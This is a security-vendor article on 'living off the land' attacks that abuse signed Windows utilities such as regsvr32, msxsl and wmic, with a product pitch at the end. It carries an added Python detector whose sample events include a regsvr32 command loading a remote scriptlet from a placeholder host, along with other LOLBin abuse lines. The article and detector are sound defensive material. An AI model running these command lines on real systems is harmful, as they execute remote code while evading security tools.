
Unexpected guests


Let's look through the list


How do criminals attack computers? The answer to this question, which seems obvious, can elicit bewildered shrugs. What's so difficult about it, given that everyone knows all the ways they can do this? Cybercriminals can send a malicious file (or a link to it) in an email. A user can download malware from the Internet (or a malicious script can be executed while a webpage is loading). Malware can be launched from removable media (such as a flash drive). The common attack vectors also include vulnerability exploits and software or firmware backdoors in recently purchased devices.

Those are threats that can be neutralised. But criminals have other options too.

How about regsvr32? This utility is a legitimate piece of software shipped with an out-of-the-box operating system. And it can accomplish a lot. For example, it lets criminals work with elevated privileges so that they can modify the registry and access files. That means these attackers don't have to write the code needed for these actions to be performed—they can take advantage of readily available utilities that have legitimate digital signatures and thus have the trust of system security mechanisms (such as routines based on application white lists). Furthermore, if an attacker can rely on standard utilities, the actual malicious file will be smaller and harder to detect.

By using legitimate applications and utilities, intruders can hide their activities in a system: even if the user decides to take a look at the list of running processes, they won't see anything new. This gives attackers enough time to accomplish their goals. This is how the Cobalt group uses regsvr32, msxsl, and wmic.

That is hardly a novel approach. Observant readers will remember us telling them about malicious scripts that utilise this very approach (some experts estimate that up to 52% of the attacks in 2017 involved PowerShell and WMI (Windows Management Instrumentation) code).

However, in this AVT issue we would like to talk about something else: the group of enthusiasts who decided to compile a complete list of the utilities, scripts, and libraries used by attackers. LOLBINs/LOLScripts/LOLLibs are, respectively, lists of binary files, scripts, and libraries that have no malicious features and usually get installed in target systems by default.

We already mentioned regsvr32. What other utilities appear on the LOLBINs list? For example, Msconfig.exe and Explorer.exe. And here you can find the complete list.

Any security researcher can contribute new items to LOLBINs/LOLScripts/LOLLibs.

How do security experts benefit from such lists? They can learn about applications whose activities may deserve special attention.
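Here is an added example of the kind of "special attention" such a list makes possible: a small detector that scans process-creation records for executions of catalogued LOLBins in a context that a signed, trusted binary rarely has on its own (spawned by an Office application or browser, a command line pointing at remote content, or wmic being used to start a process). This is not code from the article or from the LOLBAS project; the event field names mimic Sysmon Event ID 1, and the sample events, hostnames and paths are constructed for illustration.

```python
"""
Added example (not from the Dr.Web article or the LOLBAS project): flag
LOLBin executions whose context deserves an analyst's attention.
Field names mimic Sysmon Event ID 1 (Image, ParentImage, CommandLine);
the sample events below are constructed, not real telemetry.
"""
import re
from dataclasses import dataclass

# Signed Windows binaries from the LOLBAS catalogue that the article names.
# Deliberately short; a real deployment would load the full catalogue.
LOLBINS = {"regsvr32.exe", "msxsl.exe", "wmic.exe", "msconfig.exe", "explorer.exe"}

# Parents that should practically never launch administrative utilities.
SUSPICIOUS_PARENTS = {
    "winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe",
    "chrome.exe", "firefox.exe", "msedge.exe",
}

# A URL or a UNC path (\\host\share) on the command line means the utility is
# being pointed at content that did not ship with the operating system.
REMOTE_CONTENT_RE = re.compile(r"https?://|\\\\[\w.-]+\\", re.IGNORECASE)
WMIC_SPAWN_RE = re.compile(r"\bprocess\s+call\s+create\b", re.IGNORECASE)


@dataclass
class Finding:
    image: str          # basename of the LOLBin that was executed
    reasons: list       # why the execution was flagged


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path (handles both separators)."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def analyse(event: dict):
    """Return a Finding for a suspicious LOLBin execution, else None.

    A LOLBin running with an ordinary parent and a local command line is
    normal administration and is intentionally left alone.
    """
    image = basename(event.get("Image", ""))
    if image not in LOLBINS:
        return None
    parent = basename(event.get("ParentImage", ""))
    cmd = event.get("CommandLine", "")
    reasons = []
    if parent in SUSPICIOUS_PARENTS:
        reasons.append(f"spawned by {parent}")
    if REMOTE_CONTENT_RE.search(cmd):
        reasons.append("command line references remote content")
    if image == "wmic.exe" and WMIC_SPAWN_RE.search(cmd):
        reasons.append("wmic used to start a process")
    return Finding(image, reasons) if reasons else None


def scan(events):
    """Run analyse() over a sequence of events and collect the findings."""
    return [f for f in (analyse(e) for e in events) if f is not None]


# Constructed sample events: three that should be flagged, two that should not.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\regsvr32.exe",
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "CommandLine": r"regsvr32.exe /s /i:http://example.invalid/update.sct scrobj.dll"},
    {"Image": r"C:\Tools\msxsl.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"msxsl.exe data.xml http://example.invalid/style.xsl"},
    {"Image": r"C:\Windows\System32\wbem\WMIC.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'wmic process call create "notepad.exe"'},
    {"Image": r"C:\Windows\explorer.exe",            # normal shell start
     "ParentImage": r"C:\Windows\System32\userinit.exe",
     "CommandLine": r"C:\Windows\Explorer.EXE"},
    {"Image": r"C:\Windows\System32\regsvr32.exe",   # installer registering a DLL
     "ParentImage": r"C:\Windows\System32\msiexec.exe",
     "CommandLine": r'regsvr32.exe /s "C:\Program Files\Vendor\lib.dll"'},
]


if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(f"{finding.image}: {'; '.join(finding.reasons)}")
```

The point of the design is the last two sample events: the same signed binaries appear in perfectly legitimate use, so alerting on the binary name alone would bury an analyst in noise. The detector only fires when the execution context is unusual, which is exactly the information a LOLBin catalogue gives a defender: which trusted programs are worth profiling, not which programs to block.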

Dr.Web recommends

Unfortunately, using legitimate techniques is not the only way for criminals to deploy malicious code. Here’s what’s also in their arsenal:

  • The ability to penetrate systems from unprotected devices (e.g., personal devices belonging to employees or visitors that may be connected to the corporate network);
  • The ability to infect network devices;
  • The ability to deploy malware by compromising another trusted resource (e.g., application store);
  • The ability to penetrate systems and networks that have lax security;
  • The ability to exploit data transmissions that never get filtered (e.g., DNS data).

We could go on, but meanwhile, Dr.Web 12 provides protection from attacks committed by criminals who leverage the capabilities of legitimate applications. Special heuristic routines have been added that facilitate the detection of LOLBINs/LOLScripts (Living Off The Land Binaries And Scripts) attacks. They are recognised both by their specific behaviour patterns and during background and on-demand scans.
